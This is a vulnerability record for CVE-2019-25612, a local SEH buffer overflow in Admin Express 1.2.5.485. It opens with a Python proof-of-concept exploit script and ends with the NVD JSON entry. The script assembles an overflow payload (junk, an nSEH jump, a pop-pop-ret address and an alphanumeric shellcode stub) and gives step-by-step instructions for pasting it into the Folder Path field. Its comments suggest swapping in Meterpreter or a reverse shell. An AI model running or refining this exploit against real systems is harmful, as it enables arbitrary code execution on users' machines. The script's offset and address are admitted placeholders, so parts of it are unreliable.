CVE-2019-25612

import sys import struct # Proof of Concept (PoC) for CVE-2019-25612 # This script generates a malicious payload to trigger the SEH buffer overflow. # Note: Offsets and addresses need to be adjusted based on the specific environment and version. # Example structure: [Junk] + [nSEH] + [SEH] + [Shellcode] + [Padding] def generate_payload(): # 1. Offset to overwrite SEH structure (This value is hypothetical and needs debugging) offset = 600 # 2. nSEH: Next SEH record overwrite # \xeb\x06 is a short jump forward 6 bytes to skip the SE handler address # \x90\x90 are NOPs nseh = b"\xeb\x06\x90\x90" # 3. SEH: SE Handler overwrite # Address of 'pop pop ret' instruction from a non-ASLR module is required here. # This is a placeholder address (0x10020203) seh = struct.pack('<L', 0x10020203) # 4. Shellcode: Alphanumeric encoded payload # Example: MessageBoxA shellcode encoded for compatibility # Real attackers would use Meterpreter or a reverse shell here. shellcode = b"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI" # 5. Padding to ensure we crash the process properly padding = b"C" * (1000 - offset - len(nseh) - len(seh) - len(shellcode)) payload = b"A" * offset + nseh + seh + shellcode + padding return payload if __name__ == "__main__": buf = generate_payload() print("[+] Payload generated successfully.") print(f"[+] Payload length: {len(buf)} bytes") print("[+] Instruction: Copy the output and paste it into the 'Folder Path' field in Admin Express 'System Compare' feature, then click the scale icon.") # Write to file for easy handling with open("cve_2019_25612_poc.txt", "wb") as f: f.write(buf)

{"cve": {"id": "CVE-2019-25612", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:29.550", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admin Express 1.2.5.485 contains a local structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an alphanumeric encoded payload in the Folder Path field. Attackers can trigger the vulnerability through the System Compare feature by pasting a crafted buffer overflow payload into the left-hand side Folder Path field and clicking the scale icon to execute shellcode with application privileges."}, {"lang": "es", "value": "Admin Express 1.2.5.485 contiene una vulnerabilidad de desbordamiento de búfer de manejo de excepciones estructurado local que permite a atacantes locales ejecutar código arbitrario al proporcionar una carga útil codificada alfanuméricamente en el campo 'Folder Path'. Los atacantes pueden activar la vulnerabilidad a través de la función 'System Compare' pegando una carga útil de desbordamiento de búfer manipulada en el campo 'Folder Path' del lado izquierdo y haciendo clic en el icono de escala para ejecutar shellcode con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://admin-express.en.softonic.com/", "source": "[email protected]"}, {"url": "https://admin-express.en.softonic.com/download", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46805", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/admin-express-local-seh-buffer-overflow-via-folder-path", "source": "[email protected]"}]}}